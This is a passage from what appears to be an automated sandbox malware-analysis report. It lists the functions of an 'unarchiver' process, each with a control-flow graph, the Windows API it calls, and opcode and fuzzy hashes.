                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 239 cfadc8-cfae63 244 cfaebb-cfaec0 239->244 245 cfae65-cfae6d DuplicateHandle 239->245 244->245 246 cfae73-cfae85 245->246 248 cfae87-cfaeb8 246->248 249 cfaec2-cfaec7 246->249 249->248
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFAE6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 867909b017b1ffbc4923560d64040bfb1287ddcb41099a6bcae241cf397a5c86
                                                                                                            • Instruction ID: e06cbf368bb5c18041b8301a6d1724be18b3d71c390cac1ce7245e2b081f7cfa
                                                                                                            • Opcode Fuzzy Hash: 867909b017b1ffbc4923560d64040bfb1287ddcb41099a6bcae241cf397a5c86
                                                                                                            • Instruction Fuzzy Hash: 4331AF72104344AFEB228B65DC44FA7BFACEF05320F0489AEF985CB152D234A919CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFAC3A Relevance: 1.6, APIs: 1, Instructions: 95pipeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 253 cfac3a-cfad2b CreatePipe
                                                                                                            APIs
                                                                                                            • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00CFACFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreatePipe
                                                                                                            • String ID:
                                                                                                            • API String ID: 2719314638-0
                                                                                                            • Opcode ID: d24234fda18592060df7794324c17eecfc0bc3dd68c8c8b674eb671b631f05c1
                                                                                                            • Instruction ID: da64b15c3da8e678b1700b8569a1d5d9061fdc04097822ff31e7ff974926d7df
                                                                                                            • Opcode Fuzzy Hash: d24234fda18592060df7794324c17eecfc0bc3dd68c8c8b674eb671b631f05c1
                                                                                                            • Instruction Fuzzy Hash: 4631AD6240E3C06FD7038B758C61AA2BFB4AF47610F1E84CBD9C4CF1A3D2696919C762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA4E8 Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 259 cfa4e8-cfa562 263 cfa567-cfa573 259->263 264 cfa564 259->264 265 cfa578-cfa581 263->265 266 cfa575 263->266 264->263 267 cfa583-cfa5a7 CreateFileW 265->267 268 cfa5d2-cfa5d7 265->268 266->265 271 cfa5d9-cfa5de 267->271 272 cfa5a9-cfa5cf 267->272 268->267 271->272
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA589
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: aae682a8c74320229516169fd2afc1d3ebb87cb5a291ca83f4b9fc09471d8854
                                                                                                            • Instruction ID: 89605f4045b573399b3a8944aa1df0c247dd10eedf8210fcf8cc3ef46158d45d
                                                                                                            • Opcode Fuzzy Hash: aae682a8c74320229516169fd2afc1d3ebb87cb5a291ca83f4b9fc09471d8854
                                                                                                            • Instruction Fuzzy Hash: C1316DB1504744AFE722CF65DC44B66FFE8EF05310F08849EEA858B652D275E908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA9EC Relevance: 1.6, APIs: 1, Instructions: 82registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 280 cfa9ec-cfaa4f 283 cfaa54-cfaa5d 280->283 284 cfaa51 280->284 285 cfaa5f 283->285 286 cfaa62-cfaa68 283->286 284->283 285->286 287 cfaa6d-cfaa84 286->287 288 cfaa6a 286->288 290 cfaabb-cfaac0 287->290 291 cfaa86-cfaa99 RegQueryValueExW 287->291 288->287 290->291 292 cfaa9b-cfaab8 291->292 293 cfaac2-cfaac7 291->293 293->292
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFAA8C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 311655a0169df714c1d6d9a50957a895ce40e15645c1ba529c3eafa46e41e2b3
                                                                                                            • Instruction ID: 3aba157f7bd16225d979552f3c00520a8ea5a56875db9c44af50e7ea116d2a9a
                                                                                                            • Opcode Fuzzy Hash: 311655a0169df714c1d6d9a50957a895ce40e15645c1ba529c3eafa46e41e2b3
                                                                                                            • Instruction Fuzzy Hash: AF2180B2505744AFE721CF15CC44FA6FBFCEF05710F08849AE989CB252D224E908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA120 Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 275 cfa120-cfa1f3 FindNextFileW
                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00CFA1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            • Opcode ID: d7558420454e13a39a40148c1b20f147ad429deead384bff317179bacb919920
                                                                                                            • Instruction ID: 95dc1d7bdf9b32e0581631b2875541625a0d4977af6204fbac875442202f58f7
                                                                                                            • Opcode Fuzzy Hash: d7558420454e13a39a40148c1b20f147ad429deead384bff317179bacb919920
                                                                                                            • Instruction Fuzzy Hash: 6621A17140D3C06FD7138B358C51BA6BFB4EF47620F1981DBD9848F693D225A91ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFADEE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 297 cfadee-cfae63 301 cfaebb-cfaec0 297->301 302 cfae65-cfae6d DuplicateHandle 297->302 301->302 303 cfae73-cfae85 302->303 305 cfae87-cfaeb8 303->305 306 cfaec2-cfaec7 303->306 306->305
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFAE6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 58d976464691ed9c690f01ed4787c35175ffe95afd9aec253d6b55e2eeae9bbc
                                                                                                            • Instruction ID: cfa4cf9d62fb799560c5f4da2a5b0abbf59f9cd0c92b80331f84e170b5a17a8a
                                                                                                            • Opcode Fuzzy Hash: 58d976464691ed9c690f01ed4787c35175ffe95afd9aec253d6b55e2eeae9bbc
                                                                                                            • Instruction Fuzzy Hash: BF21A472500208AFEB21DF69DC44F6BFBACEF04310F14896AFA45CB651D674E9148B72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB33A Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 310 cfb33a-cfb3af 314 cfb407-cfb40c 310->314 315 cfb3b1-cfb3b9 DuplicateHandle 310->315 314->315 317 cfb3bf-cfb3d1 315->317 318 cfb40e-cfb413 317->318 319 cfb3d3-cfb404 317->319 318->319
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFB3B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e6da39d2652667c69c53e4d684841f4f7ad2bd2cc4f78e4e67167c089d4f8f4b
                                                                                                            • Instruction ID: 8ba15dfb77ff06d4bb2c16c8a6af4c0b02528b2145ff7ca3d8f0004d6285b347
                                                                                                            • Opcode Fuzzy Hash: e6da39d2652667c69c53e4d684841f4f7ad2bd2cc4f78e4e67167c089d4f8f4b
                                                                                                            • Instruction Fuzzy Hash: 3721A471500208AFEB21DF69DC45F6AFBACEF04310F14856AFA85CB651D774E9188B71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA75C Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 323 cfa75c-cfa7e2 327 cfa826-cfa82b 323->327 328 cfa7e4-cfa804 SetFilePointer 323->328 327->328 331 cfa82d-cfa832 328->331 332 cfa806-cfa823 328->332 331->332
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA7EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 7cbdd49eaa25aac1fe2e6572b4ee0ad3b5c81aab399ed90976aa39560c869ef6
                                                                                                            • Instruction ID: 55015d8ccb2e9715d75f40ebe4508ebb74ea46206a54bd388061bdea124df82b
                                                                                                            • Opcode Fuzzy Hash: 7cbdd49eaa25aac1fe2e6572b4ee0ad3b5c81aab399ed90976aa39560c869ef6
                                                                                                            • Instruction Fuzzy Hash: CA21A4714093846FE7128B24DC44F66BFB8EF46710F1984EAE9848F193D274A909C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFAAE2 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 347 cfaae2-cfab2b 348 cfab2e-cfab86 RegQueryValueExW 347->348 350 cfab8c-cfaba2 348->350
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CFAB7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: e6216c6b6ff6071ddd740487cdcefa3e628fdb3baa4f97965561619d69f81e39
                                                                                                            • Instruction ID: 61ca9a48df9e496df4bc28f2dc6eb8900f22b6649f86204a609fc5a75ec04b5b
                                                                                                            • Opcode Fuzzy Hash: e6216c6b6ff6071ddd740487cdcefa3e628fdb3baa4f97965561619d69f81e39
                                                                                                            • Instruction Fuzzy Hash: FC21F8755093C06FD3138B25DC51B62BFB8EF87A10F0981CBE9848B653D225A919C7B2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA83F Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 335 cfa83f-cfa8c5 339 cfa909-cfa90e 335->339 340 cfa8c7-cfa8e7 ReadFile 335->340 339->340 343 cfa8e9-cfa906 340->343 344 cfa910-cfa915 340->344 344->343
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA8CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 276099809b84e2744847c2f3e6e69afa8ec08487d7f56b38e5167a756f03c818
                                                                                                            • Instruction ID: f23ddc344d09dfa4a63d410cd3f7d3553622410c261abd3cd623143889881ac7
                                                                                                            • Opcode Fuzzy Hash: 276099809b84e2744847c2f3e6e69afa8ec08487d7f56b38e5167a756f03c818
                                                                                                            • Instruction Fuzzy Hash: 0821A171009384AFDB228F65DC54FA6FFB8EF46310F1884DAE9849F152C275A508CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA50A Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 351 cfa50a-cfa562 354 cfa567-cfa573 351->354 355 cfa564 351->355 356 cfa578-cfa581 354->356 357 cfa575 354->357 355->354 358 cfa583-cfa58b CreateFileW 356->358 359 cfa5d2-cfa5d7 356->359 357->356 360 cfa591-cfa5a7 358->360 359->358 362 cfa5d9-cfa5de 360->362 363 cfa5a9-cfa5cf 360->363 362->363
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA589
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 3d8e582806401bb2fcdce331f257ba6814a82c3ef26ff0ac70c6d432169e6ae7
                                                                                                            • Instruction ID: 6e0e20c319666d4296ee53c69d4ab6c3f45b5f97726580f552b42a1a5defd9b3
                                                                                                            • Opcode Fuzzy Hash: 3d8e582806401bb2fcdce331f257ba6814a82c3ef26ff0ac70c6d432169e6ae7
                                                                                                            • Instruction Fuzzy Hash: DB21B0B1504704AFEB21DF69CC44B66FBE8EF04310F14846EEA898B651D371E904CB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA69B Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 cfa69b-cfa719 370 cfa74e-cfa753 366->370 371 cfa71b-cfa72e GetFileType 366->371 370->371 372 cfa755-cfa75a 371->372 373 cfa730-cfa74d 371->373 372->373
                                                                                                            APIs
                                                                                                            • GetFileType.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA721
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3081899298-0
                                                                                                            • Opcode ID: d78406e27261f7b5120e4ccb9f563f9c9519784ff03998a60cc3f213c7fd8f07
                                                                                                            • Instruction ID: 7900e18d66ca12026d449ff97618733af1514f32c99d48e18da6140747a0a9f0
                                                                                                            • Opcode Fuzzy Hash: d78406e27261f7b5120e4ccb9f563f9c9519784ff03998a60cc3f213c7fd8f07
                                                                                                            • Instruction Fuzzy Hash: 5E21C3B54097846FE7128B259C51FA6BFBCEF46320F1980DBE9848F193D264A909C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA5E0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 377 cfa5e0-cfa5ec 378 cfa5ee-cfa605 377->378 379 cfa606-cfa64c 377->379 378->379 381 cfa64e-cfa656 FindCloseChangeNotification 379->381 382 cfa68d-cfa692 379->382 383 cfa65c-cfa66e 381->383 382->381 385 cfa694-cfa699 383->385 386 cfa670-cfa68c 383->386 385->386
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CFA654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 0842d5ec6efad8203fa46ac67b1dc80f0d19d85aad1a43ddaf37eb452c8855bb
                                                                                                            • Instruction ID: 44a2640207a200b12ce771ee0f82c1b1b5f814b13a25a05ff98b548968114546
                                                                                                            • Opcode Fuzzy Hash: 0842d5ec6efad8203fa46ac67b1dc80f0d19d85aad1a43ddaf37eb452c8855bb
                                                                                                            • Instruction Fuzzy Hash: 8821AFB540D3C49FD7538B259C94692BFB8AF03220F0980DBED85CF1A3D2689908C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA917 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFA997
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 4241100979-0
                                                                                                            • Opcode ID: f6b8d684a1be7bfc3103e1da2f018dd21898e7793ad7db884f46b05d5dac906c
                                                                                                            • Instruction ID: 0755018001ff6e4efe276d80980b8fe0619097242970fe03074a6c83f05edcf9
                                                                                                            • Opcode Fuzzy Hash: f6b8d684a1be7bfc3103e1da2f018dd21898e7793ad7db884f46b05d5dac906c
                                                                                                            • Instruction Fuzzy Hash: B121C5B15083C45FD752CB29DC55B92FFE8AF06314F0980EAD988CF153D264DA45C762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFAA12 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFAA8C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 4b79ae4d58c08a1941c0413fe53b213f7aaee7acf8bc82eddd8ef60d2729be2f
                                                                                                            • Instruction ID: eabf0a48b1692bc6a9b9365d9bf32ef264dec3cf893a0e405eeacea13a36c762
                                                                                                            • Opcode Fuzzy Hash: 4b79ae4d58c08a1941c0413fe53b213f7aaee7acf8bc82eddd8ef60d2729be2f
                                                                                                            • Instruction Fuzzy Hash: DC2181B1600608AFEB61CE15CD84F66FBECEF04710F14C46AEA498B251D660E908DE72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA86E Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA8CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 85c4ae0e3ee262afaa55298a4c7edfac5e31a69a19e4937feddb03b131c6d7ce
                                                                                                            • Instruction ID: 9fc99df8b44145b4636cde942fcae7e4b99abd46674071068f6bb6ee5d697717
                                                                                                            • Opcode Fuzzy Hash: 85c4ae0e3ee262afaa55298a4c7edfac5e31a69a19e4937feddb03b131c6d7ce
                                                                                                            • Instruction Fuzzy Hash: 9811C471401304AFEB21CF55DC84FAAFBA8EF44310F14C46AEE498F251D275A504CB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA78E Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA7EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 2661c5cab78a9bdde585cb7675349b13b2d146904be3d73da941ac3e6dbb987c
                                                                                                            • Instruction ID: 838f489a8a5ffd97deb4bf58fac770db0da4a81e9d69d365bafd5a5d4ad14bb0
                                                                                                            • Opcode Fuzzy Hash: 2661c5cab78a9bdde585cb7675349b13b2d146904be3d73da941ac3e6dbb987c
                                                                                                            • Instruction Fuzzy Hash: 81119171501204AFEB61DF59DC84FAAFBA8EF44720F14C4AAEE499F241D274A5048BB2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 2bf45b609c2c02f7361d70e967cd968440c2d3152712a47883da1c4994031fb3
                                                                                                            • Instruction ID: 14095f379bfbf6d44f9244c9353000c6a4bbaf874f50ab7ee044e85b94310fe6
                                                                                                            • Opcode Fuzzy Hash: 2bf45b609c2c02f7361d70e967cd968440c2d3152712a47883da1c4994031fb3
                                                                                                            • Instruction Fuzzy Hash: 4C118F754093C49FD7228B25DC54A52FFB4DF16220F0980DBDD888F263D265A948CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB04F Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: 6b53a1a9fe30be6d5154b0a349824bb968847211482811231c24170f209060d7
                                                                                                            • Instruction ID: ec9acc43a5aba59adbdae9fdd49534501f0cec5ceaa0efb53e6406c5948e5d09
                                                                                                            • Opcode Fuzzy Hash: 6b53a1a9fe30be6d5154b0a349824bb968847211482811231c24170f209060d7
                                                                                                            • Instruction Fuzzy Hash: 6411A0755093C49FDB128B25DC85B52FFB4EF06220F09C0DBED858B2A2C374A848CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA6CE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileType.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA721
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3081899298-0
                                                                                                            • Opcode ID: 5e6198ee24f1eee3673830f2f919f5cd48aa41fb2284145c912e9e842cc3f6ad
                                                                                                            • Instruction ID: 863bf4ee0b341b03f6790309948ddaf9b5faaf55269fad4f09c8a4719110fa71
                                                                                                            • Opcode Fuzzy Hash: 5e6198ee24f1eee3673830f2f919f5cd48aa41fb2284145c912e9e842cc3f6ad
                                                                                                            • Instruction Fuzzy Hash: CE01D671501304AEEB20DB19DC85FBAFBACDF44720F14C09BEE489F241D274A9048AB3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA952 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFA997
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
